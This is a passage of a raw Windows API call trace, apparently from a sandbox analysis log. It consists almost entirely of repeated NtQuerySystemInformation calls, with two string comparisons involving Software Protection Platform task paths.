SystemInformation=0xf7a67fd3e0, Length=0x20, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0208.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd520, Length=0x20, ResultLength=0x0) [0208.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0208.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0208.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x50, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x50, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x50, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0208.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0208.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0208.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x20, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0208.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0208.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0208.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x20, ResultLength=0x0) [0208.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0208.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0208.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x50, ResultLength=0x0) [0208.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x50, ResultLength=0x0) [0208.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x50, ResultLength=0x0) [0208.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0208.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0208.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0208.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0208.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0208.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0208.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0208.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0208.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0208.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0208.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0208.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0208.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0208.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x20, ResultLength=0x0) [0208.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0208.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0208.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0208.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0208.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x20, ResultLength=0x0) [0208.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0208.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0208.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0208.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda10, Length=0x28, ResultLength=0x0) [0208.566] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0208.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0208.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0208.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0208.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0208.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0208.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0208.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x28, ResultLength=0x0) [0208.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0208.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0208.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0208.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x20, ResultLength=0x0) [0208.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0208.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0208.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0208.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0208.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0208.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0208.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0208.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0208.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x40, ResultLength=0x0) [0208.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb20, Length=0x40, ResultLength=0x0) [0208.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb20, Length=0x40, ResultLength=0x0) [0208.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x30, ResultLength=0x0) [0208.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x30, ResultLength=0x0) [0208.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd948, Length=0x30, ResultLength=0x0) [0208.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x38, ResultLength=0x0) [0208.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0208.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0208.762] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0208.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0208.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0208.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 